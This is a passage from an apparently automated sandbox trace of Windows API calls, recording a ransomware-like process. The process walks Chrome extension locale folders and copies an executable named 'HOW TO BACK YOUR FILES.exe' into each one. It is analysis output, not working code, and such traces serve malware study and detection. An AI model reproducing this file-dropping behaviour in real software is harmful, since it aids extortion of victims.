Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.331] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.331] GetLastError () returned 0x0 [0111.331] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.331] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869b0010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.341] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0111.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th" [0111.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.342] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.342] GetLastError () returned 0x0 [0111.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.342] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.343] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0111.343] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr" [0111.343] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.343] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.344] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.344] GetLastError () returned 0x0 [0111.344] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.344] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86a22430, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9c6b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9c6b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.344] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0111.345] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl" [0111.345] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.345] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.345] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.346] GetLastError () returned 0x0 [0111.346] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.346] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d9ecca0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d9ecca0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.346] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0111.346] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk" [0111.346] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.346] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.368] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.368] GetLastError () returned 0x0 [0111.369] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.369] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.369] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0111.369] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se" [0111.369] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.369] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.370] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.370] GetLastError () returned 0x0 [0111.370] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.370] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.371] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0111.371] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru" [0111.371] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.371] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.372] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.372] GetLastError () returned 0x0 [0111.372] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.372] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869fc2d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da12e00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da12e00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.373] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0111.373] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro" [0111.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.373] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.374] GetLastError () returned 0x0 [0111.374] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.374] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6da38f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6da38f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0111.374] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" [0111.375] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT" [0111.375] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0111.375] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_pt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0111.375] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0111.376] GetLastError () returned 0x0 [0111.376] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0111.376] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pt_PT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x869d6170, ftCreationTime.dwHighDateTime=0x1d2dd9e, 